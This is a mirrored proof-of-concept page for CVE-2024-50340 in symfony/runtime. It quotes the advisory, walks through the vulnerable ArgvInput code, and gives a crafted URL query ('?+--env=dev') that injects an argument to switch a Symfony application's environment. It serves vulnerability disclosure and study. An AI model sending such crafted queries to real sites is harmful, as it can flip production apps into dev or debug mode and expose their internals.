Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-50340 PoC — Ability to change environment from query in symfony/runtime

Source
https://github.com/Nyamort/CVE-2024-50340
Associated Vulnerability
Title:Ability to change environment from query in symfony/runtime (CVE-2024-50340)
Description:symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes. All users are advised to upgrade. There are no known workarounds for this vulnerability.
Readme
# CVE-2024-50340 POC

## Requirements 
The register_argc_argv option must be enabled in the PHP configuration file (php.ini). This setting loads command-line arguments into $_SERVER['argv'].

## Explanation of Vulnerable Code
This Symfony code uses input arguments (ArgvInput) to determine the values of certain environment variables, specifically APP_ENV and APP_DEBUG. Here are the relevant parts of Symfony’s code:
```php
//Symfony\Component\Runtime\SymfonyRuntime
$input = new ArgvInput();

if (isset($this->options['env'])) {
    return $this->input = $input;
}

if (null !== $env = $input->getParameterOption(['--env', '-e'], null, true)) {
    putenv($this->options['env_var_name'].'='.$_SERVER[$this->options['env_var_name']] = $_ENV[$this->options['env_var_name']] = $env);
}

if ($input->hasParameterOption('--no-debug', true)) {
    putenv($this->options['debug_var_name'].'='.$_SERVER[$this->options['debug_var_name']] = $_ENV[$this->options['debug_var_name']] = '0');
}
```

The code above processes arguments provided through ArgvInput. If the --env parameter is specified in argv, it updates the environment variable APP_ENV accordingly. Similarly, if --no-debug is present, it sets APP_DEBUG to 0.

### The ArgvInput Class
The ArgvInput class initializes argv parameters passed via the command line or, by default, those in $_SERVER['argv']. The array_shift($argv); function removes the first element from the $argv array (normally the application name) and stores the remaining arguments in $this->tokens.

```php
//Symfony\Component\Console\Input\ArgvInput
public function __construct(?array $argv = null, ?InputDefinition $definition = null)
{
    $argv ??= $_SERVER['argv'] ?? [];

    // strip the application name
    array_shift($argv);

    $this->tokens = $argv;

    parent::__construct($definition);
}
```
## PoC Example
Using the following URL: http://localhost/?+--env=dev, we can inject a --env=dev argument into $_SERVER['argv']. This allows us to change the APP_ENV value to dev without modifying the application’s configuration directly.
1. When accessing http://localhost/?+--env=dev, $_SERVER['argv'] might look like this:
```php
$_SERVER['argv'] = ["+--env=dev"];
```
2. In the ArgvInput class, after the array_shift operation, $argv becomes:
```php
$argv = ["--env=dev"];
```
3. ArgvInput will then recognize --env=dev as a valid parameter and will update APP_ENV accordingly through the getParameterOption method.
File Snapshot

 [4.0K]  /data/pocs/1d8c2990387e7d72afff571798b020016a05335c
└── [2.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →